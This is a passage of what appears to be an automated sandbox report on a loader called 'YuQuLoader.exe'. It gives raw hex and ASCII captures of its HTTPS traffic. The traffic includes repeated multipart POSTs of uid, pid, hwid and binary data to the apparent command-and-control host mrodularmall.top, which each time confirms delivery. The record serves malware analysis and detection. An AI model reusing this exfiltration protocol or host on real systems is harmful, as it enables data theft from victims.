                                                                                    2025-03-11 16:23:32 UTC1369INData Raw: 54 8d cd 32 ec f4 bc 90 b8 20 2b 21 22 25 60 8a c9 7f 2e 2c 81 ec 23 fb ed 1d 0b 0f 92 33 0f 02 12 3b 83 20 40 dd 89 39 8f c7 c8 dc 50 ac c4 a5 d0 4b 9a 9a 1d 67 99 3e 3c fb 7b 6d cb 4e 30 0d a4 35 49 34 ea 00 b8 ff 6e 0d b3 78 d3 c6 ac 72 65 3f c3 4a e7 8d 69 92 ee a2 93 2a 20 d4 d7 14 b1 6a 14 93 f6 a0 e1 95 60 b4 71 07 d9 e4 15 45 15 76 9d 20 ea 82 9a 6a f4 ee b5 3c bb ab 79 b9 ec 7f 79 89 f6 9f 8f b6 da b1 11 8e 01 e3 04 eb 91 9d 56 69 eb a0 99 01 fa 21 dd 46 c5 b3 03 ef db 6a 93 b1 11 38 f1 cd b3 a1 03 32 d5 d2 58 17 d7 a1 2e 03 9d c6 6b 4a 23 73 f5 55 4f b3 0d 53 f4 49 dc b7 52 f7 5b e1 9e d9 ee 99 7c 57 ff 65 aa a3 b2 27 c4 ff 8e 3d d6 09 9c 7c ac 46 ff 36 ee da 24 61 50 bb f9 b6 bb 27 de 13 58 8d b4 17 42 6e b6 29 ea 17 d9 98 21 45 f0 8b 59 1f 1c
                                                                                    Data Ascii: T2 +!"%`.,#3; @9PKg><{mN05I4nxre?Ji* j`qEv j<yyVi!Fj82X.kJ#sUOSIR[|We'=|F6$aP'XBn)!EY
                                                                                    2025-03-11 16:23:32 UTC1369INData Raw: e8 79 cf 6f f1 18 69 77 38 c3 ab 08 01 b8 f7 98 4a 2c 91 08 78 ec b8 95 9f 3c 39 be 57 e9 03 39 f6 4e ca bb 95 01 98 8b 94 eb fd 97 00 5d db 95 40 15 33 96 70 60 4d 7e 02 6e 29 27 28 44 ef cb eb 4c bf cf 77 09 96 30 51 2f b4 3f b2 d1 2c 47 fb d2 40 04 b2 1b c6 12 a7 01 fb cb 0a 77 b0 aa 98 2a 91 e5 6e 7c 38 fa 26 70 d5 04 25 54 d6 a4 ab d2 e9 f3 88 48 e0 f4 be f4 1d 85 63 dd 13 75 0b 1f 91 67 d2 57 61 42 36 4b c1 7e e8 17 88 17 26 a2 24 e9 2f f1 4b 84 51 86 67 52 7f d9 d0 b6 05 fd 8f f9 04 15 50 2e 86 d2 09 11 2d b9 de 71 0c 6b a1 21 c2 de cc 2d dd a9 7a 0a 69 ed 43 1e f2 fa 0e 8e 73 7a 5a 46 05 44 33 4d 3a 62 10 a0 79 10 89 51 44 97 dc c7 17 29 c0 ee b1 4f ec 8a 53 3f 33 89 b8 5f 36 8a f6 56 6d 91 5f 3d f0 2c 01 8f 44 90 ff e8 53 74 2b 01 6f fc 67 aa 08
                                                                                    Data Ascii: yoiw8J,x<9W9N]@3p`M~n)'(DLw0Q/?,G@w*n|8&p%THcugWaB6K~&$/KQgRP.-qk!-ziCszZFD3M:byQD)OS?3_6Vm_=,DSt+og
                                                                                    2025-03-11 16:23:32 UTC1369INData Raw: 26 8a 9c 3c 48 dc 1f 54 22 da f5 94 4c c5 3a 06 55 08 51 46 2b 68 e2 68 56 2c 4b e2 c1 25 d8 23 95 75 af df 1c af 6a 21 5d 5f 0a 16 a5 3e c1 d0 fc f2 bc a1 6c ef 23 00 3d 21 57 30 1c 63 9d 0c 0d 80 c3 bb de ff 26 01 a6 e7 82 10 2b 41 60 75 66 46 ca 55 b0 a6 cc 60 4b f6 78 98 9c b5 56 46 94 d2 44 31 67 24 af 31 32 c5 4d 13 54 7f 90 b7 4c e3 aa 41 1d 51 0d b6 aa 99 3c 81 bd 7f 14 17 0a 46 1c 95 e6 cc 8d 9c 72 99 5e d9 7b c2 0b 4a d9 bf 85 62 31 4b 1a 5a b7 fd df 37 2d 6b 9a 39 a2 3c 6e 70 31 e7 ae fb bd 17 de f1 c3 38 66 1a c0 ec d0 ab cb 62 92 98 64 e8 d6 23 b2 6c 91 04 3a 9e 5d 44 7c ac 0f ec 79 4e 1b a3 3d f3 98 d8 c8 ba 96 26 b0 7e 47 7f 30 af 51 f2 05 5f 5e b8 44 a3 31 2a c1 db a4 f7 24 79 81 b1 b6 63 72 eb 33 42 8f f4 33 0b cd 92 3a f3 e8 ef 15 40 61
                                                                                    Data Ascii: &<HT"L:UQF+hhV,K%#uj!]_>l#=!W0c&+A`ufFU`KxVFD1g$12MTLAQ<Fr^{Jb1KZ7-k9<np18fbd#l:]D|yN=&~G0Q_^D1*$ycr3B3:@a
                                                                                    2025-03-11 16:23:32 UTC1369INData Raw: 9f 53 21 ed c8 d0 17 7e 92 69 50 5c 4b ba f8 b2 2b 9e 02 0e 47 d1 c4 56 10 df b6 29 58 19 69 d2 a8 c8 15 03 56 d2 4f 4b b3 93 95 7c ee 03 cf 00 8c 9f 5c 5f 33 f1 f9 e2 63 8b eb 2e 36 7a 27 ae 52 2f d8 73 5b 23 d0 47 f4 e1 82 f4 37 13 4a 57 12 24 97 c0 f6 a4 3f 24 26 6c a8 5d 04 25 d8 69 8e 9a e4 1a db 92 65 4d 1a 6e fd c9 c6 e1 b8 8d f8 e0 5c 61 4f ab b6 71 a7 d4 a5 3e 05 f9 22 8a be 92 62 ce f8 a3 a4 03 6f 16 a8 bb c9 5e e0 fa e2 e7 31 64 0f 33 4f c6 2f c4 93 d8 91 3a 54 de ec ff de 54 6c 1d 12 db 7b 28 21 e8 23 eb 8d 58 6e c1 8a 92 4e e3 22 80 2d ec 5f b8 5e 73 b5 4a 7c 59 e8 a6 31 58 1c ed 55 34 69 d5 7b 85 91 36 bb 62 ab 4a 0f 21 0f 5b 3e 93 7e 14 22 c1 1b d9 65 3e 70 c8 3a d1 8e ff c4 b7 41 06 b0 d2 f3 9e 2b 0d 79 4c 6c 50 58 2a 9f 32 56 c4 bf 2d 01
                                                                                    Data Ascii: S!~iP\K+GV)XiVOK|\_3c.6z'R/s[#G7JW$?$&l]%ieMn\aOq>"bo^1d3O/:TTl{(!#XnN"-_^sJ|Y1XU4i{6bJ![>~"e>p:A+yLlPX*2V-
                                                                                    2025-03-11 16:23:32 UTC1369INData Raw: 39 c7 ed 85 7a ad cb 8d ed 57 78 86 2c 94 ef b2 7c df 01 e4 3e 0f cb ce e0 65 e1 a1 cd 2b 3d c7 bc 49 78 a5 a8 5a 3a 76 2c db 8b 3c de 98 d3 47 9d fd 34 91 8e dd 3d cd dd 7d 65 ce 95 9f 87 75 fd 6c e8 db 0f a0 5f b0 05 fa dc 46 e4 6f 28 d1 34 26 f0 9e 25 b8 7d db b1 6e bb 57 07 58 a2 8a 10 57 3e 03 60 4e 5e 4d 9a 94 cd 25 46 b4 0e 68 8b eb 01 fe 15 3e 00 fe c8 2b 92 72 9d 16 29 a6 f7 b1 a2 83 a4 16 9d fc ff 41 05 08 6d 62 2f c1 c2 54 ef ac 88 24 0f 7a 78 f7 78 35 0b 89 93 f5 77 b1 da ed 4b ce 5c 08 14 d7 09 86 41 d8 64 bf 5c bf eb 9a 03 93 81 92 bd ed 07 71 7c ae 6b fe d7 32 db 05 56 0f 96 2b 53 d0 af 1e 85 ea e3 16 05 fd 43 81 30 b0 04 01 d8 09 e2 b6 ca 17 04 14 df 04 99 c6 06 69 c1 9c 9d 56 a5 78 9c db 1a 64 6a ed 91 4a 6e a3 5d 6c 54 30 94 86 57 6b e6
                                                                                    Data Ascii: 9zWx,|>e+=IxZ:v,<G4=}eul_Fo(4&%}nWXW>`N^M%Fh>+r)Amb/T$zxx5wK\Ad\q|k2V+SC0iVxdjJn]lT0Wk
                                                                                    2025-03-11 16:23:32 UTC1369INData Raw: 10 db a1 70 b8 ed f0 ac 95 64 0b 46 04 32 2c d3 04 45 7b 83 f6 28 d1 11 8a 42 8b 8f 3f 8c a5 44 3a 96 fd 29 4e 27 ce a8 8e 8b a9 78 13 40 6f 12 00 fc c6 86 6a 3e 23 a8 c9 ef 3c 5e 3a 82 5d 62 2c 0a c4 57 8e 40 d6 97 43 04 12 7c 80 3e 72 38 40 74 0d ac b9 c4 2f 9d 56 8f ae 2d 71 f4 31 e4 27 cd ac 6e de 4a c8 4e 2a 1f c3 90 64 63 c0 72 6e b9 79 6e c6 64 8c b2 6f d1 4e 23 2b 41 3b 96 f3 bd 07 26 3b 79 33 f3 05 07 b9 a6 b6 03 cb 02 13 cf 05 aa 98 2e 69 0a 9f 2e 90 b7 c5 e6 5c 66 e9 5c 4d 69 0b f1 ad 83 10 0a e3 83 1b 87 9f 22 58 ef 5c 7d 0e 10 45 d1 34 40 a7 03 48 34 52 27 c6 cd ba 4d b5 3d 0f 6c 03 1c 9c 4c 49 f3 20 5c 7d 56 6d 0a e4 96 3b 1c 1c 77 53 50 a3 e8 fb 8a a6 21 7a 5a 24 09 92 f8 e3 c2 4a cd 12 c4 78 c5 1f 13 5a b8 51 a1 7c 5b c4 6d 56 8e 9d 43 82
                                                                                    Data Ascii: pdF2,E{(B?D:)N'x@oj>#<^:]b,W@C|>r8@t/V-q1'nJN*dcrnyndoN#+A;&;y3.i.\f\Mi"X\}E4@H4R'M=lLI \}Vm;wSP!zZ$JxZQ|[mVC
                                                                                    2025-03-11 16:23:32 UTC1369INData Raw: 7f 98 9f 5b dc 7d 56 06 22 1e 5a 2a a1 21 d8 21 9a 3f 6c 36 b4 04 b9 04 a2 4b bb 61 2e 8f a1 99 90 f8 2b 6a 64 dd b2 81 6b 7b 17 72 b5 00 de e0 c3 89 81 cb d9 49 36 3b fa 57 b0 49 4e 83 11 fc 04 83 bf 01 91 66 8a 4c 1e e7 dd 43 b9 c4 65 f7 48 b3 24 8f f0 2a 93 ff 4b 4e 3a 2d c1 2a d6 56 c5 03 bb 39 0f dd dd 9e af 93 ee 26 ec 21 30 0d c2 54 4e 11 36 6a 51 4f 13 11 2b 73 ea 1e b0 a2 61 b4 60 4e 17 f1 cd 24 3e f3 5b 99 81 09 73 30 cd 85 83 7e 0c 40 97 88 bb 8e 93 96 81 ba 10 f3 df 98 57 c5 df dd 88 6c 9b 54 c6 8a a7 28 2f b3 ed b2 a2 2a 71 27 7b 13 aa 23 a2 d0 cc 73 72 72 15 fd 1c 1d 98 11 01 e4 e6 dc b7 eb 46 d4 15 ca 5d 1c 2f 70 51 e2 c9 31 25 86 d2 db 36 d5 c6 af b4 4a 35 d1 a5 c5 87 65 03 83 c6 32 a7 38 b0 bb 6d 9f c5 bf 88 92 03 ff 4c 8f 84 49 99 de 28
                                                                                    Data Ascii: [}V"Z*!!?l6Ka.+jdk{rI6;WINfLCeH$*KN:-*V9&!0TN6jQO+sa`N$>[s0~@WlT(/*q'{#srrF]/pQ1%6J5e28mLI(
                                                                                    2025-03-11 16:23:32 UTC1369INData Raw: c9 1a 61 58 a0 4f 36 9b 4f 48 77 84 be 4a 90 69 c8 30 c2 68 ea 9d a1 89 6b 84 33 ca 60 3f b2 ee cc 93 a5 53 c8 be 24 00 0f 04 52 ab 41 d2 9d ee bc 79 55 4d 5b d4 90 dd b1 9e 5a af f7 d4 8e de b1 1c 0b ac 4e 00 d1 e7 25 ee 42 1f f9 65 99 80 5a 1e f1 be e5 d9 fd 29 f6 8a 0a 60 3d b4 45 0a d4 f0 47 a1 53 5f 8c 70 4c 61 a2 2c bb a3 22 33 b6 88 87 8b 2f 96 18 5a c8 c8 c6 7f 50 54 f1 f7 34 06 bb 38 f6 32 29 1f 88 14 59 19 47 ce c8 a5 64 3a 91 42 40 0d 40 4d 08 9b 7a f8 57 9a 49 da f6 e5 5f 9c 13 be 99 db cc 76 6a 83 2f fc f0 db a6 f3 ed 8d dc 9c b5 7e 6c 47 82 ad 2a 58 d3 72 a7 52 c5 64 2f ed b9 58 46 b5 0e 85 5a 4e 86 ca 84 e5 0c 21 23 8d ea ba 28 a2 af 90 2c a6 32 4d d0 d4 bc 8d e5 cc 9a 1c c4 0f 72 91 aa 62 07 82 27 b9 a3 3b b1 25 31 f1 24 6b 8b cd ae c3 1a
                                                                                    Data Ascii: aXO6OHwJi0hk3`?S$RAyUM[ZN%BeZ)`=EGS_pLa,"3/ZPT482)YGd:B@@MzWI_vj/~lG*XrRd/XFZN!#(,2Mrb';%1$k


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.549716104.21.112.14438668C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-11 16:23:35 UTC274OUTPOST /aNzS HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=53Oe3gS1M
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 14892
                                                                                    Host: mrodularmall.top
                                                                                    2025-03-11 16:23:35 UTC14892OUTData Raw: 2d 2d 35 33 4f 65 33 67 53 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 31 64 64 34 65 64 38 37 63 64 30 31 31 64 66 30 36 34 38 38 37 32 63 30 31 36 36 30 32 33 61 35 35 34 36 37 34 32 66 65 39 34 63 66 64 39 63 61 61 66 64 37 65 61 34 0d 0a 2d 2d 35 33 4f 65 33 67 53 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 33 4f 65 33 67 53 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 30 46 34 41 46 36 31 43 42 30 32 45 31 39
                                                                                    Data Ascii: --53Oe3gS1MContent-Disposition: form-data; name="uid"71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4--53Oe3gS1MContent-Disposition: form-data; name="pid"2--53Oe3gS1MContent-Disposition: form-data; name="hwid"520F4AF61CB02E19
                                                                                    2025-03-11 16:23:36 UTC819INHTTP/1.1 200 OK
                                                                                    Date: Tue, 11 Mar 2025 16:23:36 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LjG5wZx%2BWqT1TsT0WBhWS2LksxKBQB0NqUy5fiddQVR%2B5DZcfdx%2BCAYQjp2%2Bx4gKLEvRgc2j13xxuJ%2FZYClCJNojU9LeS9LvuSufxwXtPxXFSYajaCnfmzcd2U52KF4%2Fp3cT"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 91ec65b1188b423a-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=32672&min_rtt=30798&rtt_var=11911&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15824&delivery_rate=74641&cwnd=32&unsent_bytes=0&cid=fed6d38ed2c4f67f&ts=997&x=0"
                                                                                    2025-03-11 16:23:36 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 34 38 2e 33 31 2e 31 38 32 22 7d 7d 0d 0a
                                                                                    Data Ascii: 45{"success":{"message":"message success delivery from 73.148.31.182"}}


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.549717104.21.112.14438668C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-11 16:23:38 UTC278OUTPOST /aNzS HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=FZUWWktq31htF
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 15061
                                                                                    Host: mrodularmall.top
                                                                                    2025-03-11 16:23:38 UTC15061OUTData Raw: 2d 2d 46 5a 55 57 57 6b 74 71 33 31 68 74 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 31 64 64 34 65 64 38 37 63 64 30 31 31 64 66 30 36 34 38 38 37 32 63 30 31 36 36 30 32 33 61 35 35 34 36 37 34 32 66 65 39 34 63 66 64 39 63 61 61 66 64 37 65 61 34 0d 0a 2d 2d 46 5a 55 57 57 6b 74 71 33 31 68 74 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 5a 55 57 57 6b 74 71 33 31 68 74 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 30 46
                                                                                    Data Ascii: --FZUWWktq31htFContent-Disposition: form-data; name="uid"71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4--FZUWWktq31htFContent-Disposition: form-data; name="pid"2--FZUWWktq31htFContent-Disposition: form-data; name="hwid"520F
                                                                                    2025-03-11 16:23:39 UTC814INHTTP/1.1 200 OK
                                                                                    Date: Tue, 11 Mar 2025 16:23:39 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NHusKjYrFX4moLnJiAKkGcwcU1sJ5qOkHU%2F5eLgUbLMk%2Bsj2gr1EKgAO7cmSvCMzUe0EoT%2B8dClIt9kjEn1lHkFLA7THnVgMDdx8k6PiuAQwlvmoit2Blvepfl8HqxLzAu0k"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 91ec65c4d946425f-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=42921&min_rtt=31685&rtt_var=16603&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15997&delivery_rate=75607&cwnd=32&unsent_bytes=0&cid=4f146af7002e8f02&ts=1028&x=0"
                                                                                    2025-03-11 16:23:39 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 34 38 2e 33 31 2e 31 38 32 22 7d 7d 0d 0a
                                                                                    Data Ascii: 45{"success":{"message":"message success delivery from 73.148.31.182"}}
                                                                                    2025-03-11 16:23:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.549718104.21.112.14438668C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-11 16:23:41 UTC278OUTPOST /aNzS HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=ZljRRr7joE7Lj
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 20550
                                                                                    Host: mrodularmall.top
                                                                                    2025-03-11 16:23:41 UTC15331OUTData Raw: 2d 2d 5a 6c 6a 52 52 72 37 6a 6f 45 37 4c 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 31 64 64 34 65 64 38 37 63 64 30 31 31 64 66 30 36 34 38 38 37 32 63 30 31 36 36 30 32 33 61 35 35 34 36 37 34 32 66 65 39 34 63 66 64 39 63 61 61 66 64 37 65 61 34 0d 0a 2d 2d 5a 6c 6a 52 52 72 37 6a 6f 45 37 4c 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 5a 6c 6a 52 52 72 37 6a 6f 45 37 4c 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 30 46
                                                                                    Data Ascii: --ZljRRr7joE7LjContent-Disposition: form-data; name="uid"71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4--ZljRRr7joE7LjContent-Disposition: form-data; name="pid"3--ZljRRr7joE7LjContent-Disposition: form-data; name="hwid"520F
                                                                                    2025-03-11 16:23:41 UTC5219OUTData Raw: e5 b1 d5 d3 fb f4 f5 e0 0b 85 be e0 7d c8 c4 97 39 fa 1d 5a 7e d4 f2 22 ab ef dc 86 3b 76 e6 15 97 b2 c8 5e 24 29 81 6d ec 59 a4 b1 c8 4d 68 12 8a aa 63 bf 8c 9e 3a 76 3f 63 a9 ca 13 3e 52 f8 2b 04 56 f7 05 57 3e be 29 43 6f 92 61 02 28 27 69 68 07 65 b9 56 15 40 10 c5 00 25 de 7a 77 a7 e6 3b bf 43 53 b4 1a a5 47 41 d5 fe 70 32 19 71 f4 bf 15 84 b7 f5 15 4f f9 0e 8e 92 a9 34 39 45 58 27 ea 32 2c e9 9b bf b8 fa 80 14 ed 14 8f ff 6b 8c bb 9d 0a ce c8 7a d4 65 a7 34 e4 eb 2b aa d3 88 b4 d8 2e 70 0b d7 f5 c9 45 13 d6 68 a8 8a 62 ae 9a a8 fa 63 d7 39 56 c3 ef 08 ff 87 39 8b f0 b8 1f 20 16 ea 63 00 70 83 21 ad 50 7e b6 cb d7 04 63 95 ce c4 5f 0f bc f5 c7 d0 86 93 83 b6 0b c8 f7 b1 54 51 11 15 ab cf b4 68 d1 f9 ce 1c 7b 40 3f 2c fb 7b 1e 74 ae c1 ae 9a 03 93 ff
                                                                                    Data Ascii: }9Z~";v^$)mYMhc:v?c>R+VW>)Coa('iheV@%zw;CSGAp2qO49EX'2,kze4+.pEhbc9V9 cp!P~c_TQh{@?,{t
                                                                                    2025-03-11 16:23:43 UTC813INHTTP/1.1 200 OK
                                                                                    Date: Tue, 11 Mar 2025 16:23:42 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MlCR6odPL51QJ7xYqA2LuH2SkZztNIimf3Dd10tq4tgvwDszlMEt5vgklqMAQzxTS1KJaqRiwh5KpG%2Bq1mAlFHMyyiVCzRvQB%2BL1wBSo0XZD47zW80ZmcTFoxYG4abrD3MZ1"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 91ec65d8acb707b9-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=43668&min_rtt=37887&rtt_var=20677&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21508&delivery_rate=46293&cwnd=214&unsent_bytes=0&cid=b31e4c49030e14ba&ts=1245&x=0"
                                                                                    2025-03-11 16:23:43 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 34 38 2e 33 31 2e 31 38 32 22 7d 7d 0d 0a
                                                                                    Data Ascii: 45{"success":{"message":"message success delivery from 73.148.31.182"}}
                                                                                    2025-03-11 16:23:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.549721104.21.112.14438668C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-11 16:23:46 UTC272OUTPOST /aNzS HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=o38L1GPF
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 2460
                                                                                    Host: mrodularmall.top
                                                                                    2025-03-11 16:23:46 UTC2460OUTData Raw: 2d 2d 6f 33 38 4c 31 47 50 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 31 64 64 34 65 64 38 37 63 64 30 31 31 64 66 30 36 34 38 38 37 32 63 30 31 36 36 30 32 33 61 35 35 34 36 37 34 32 66 65 39 34 63 66 64 39 63 61 61 66 64 37 65 61 34 0d 0a 2d 2d 6f 33 38 4c 31 47 50 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 6f 33 38 4c 31 47 50 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 30 46 34 41 46 36 31 43 42 30 32 45 31 39 33 31 32
                                                                                    Data Ascii: --o38L1GPFContent-Disposition: form-data; name="uid"71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4--o38L1GPFContent-Disposition: form-data; name="pid"1--o38L1GPFContent-Disposition: form-data; name="hwid"520F4AF61CB02E19312
                                                                                    2025-03-11 16:23:47 UTC816INHTTP/1.1 200 OK
                                                                                    Date: Tue, 11 Mar 2025 16:23:46 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zD%2FHbpAiw7oEDRyb0CLVo4mkUluPIH8qg20XgQalkxcFXZ6hPO8lbFBWPaEwqfPoRQIxXHq9Hzq7%2BwtIgBuNOCuQOVhfXaGD0cp7v6kb%2BgoYkCCe8vaZDLapQ3xTD%2F%2FBwhBq"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 91ec65f3a90107b5-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=27686&min_rtt=22823&rtt_var=15264&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=3368&delivery_rate=58622&cwnd=222&unsent_bytes=0&cid=5c31231fe09ea56e&ts=1062&x=0"
                                                                                    2025-03-11 16:23:47 UTC75INData Raw: 34 35 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 37 33 2e 31 34 38 2e 33 31 2e 31 38 32 22 7d 7d 0d 0a
                                                                                    Data Ascii: 45{"success":{"message":"message success delivery from 73.148.31.182"}}


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.549723104.21.112.14438668C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-11 16:23:49 UTC276OUTPOST /aNzS HTTP/1.1
